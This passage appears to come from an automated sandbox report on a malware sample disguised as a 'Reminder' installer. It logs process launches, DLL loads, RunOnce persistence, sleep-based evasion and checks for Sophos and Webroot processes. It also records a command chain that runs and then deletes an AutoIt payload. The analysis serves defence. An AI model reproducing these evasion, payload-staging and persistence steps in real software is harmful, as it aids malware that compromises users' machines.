Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: explorerframe.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Window found: window name: TMainForm
Source: Reminder.exe Static file information: File size 10161880 > 1048576
Source: Reminder.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Reminder.exe Static PE information: real checksum: 0x9b2654 should be: 0x9bc79f
Source: Reminder.exe Static PE information: section name: .didata
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\coigned\is-9F4FN.tmp
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep count: 102 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -3060000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6512 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep count: 191 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -5730000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\System32\tasklist.exe System information queried: CodeIntegrityInformation
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
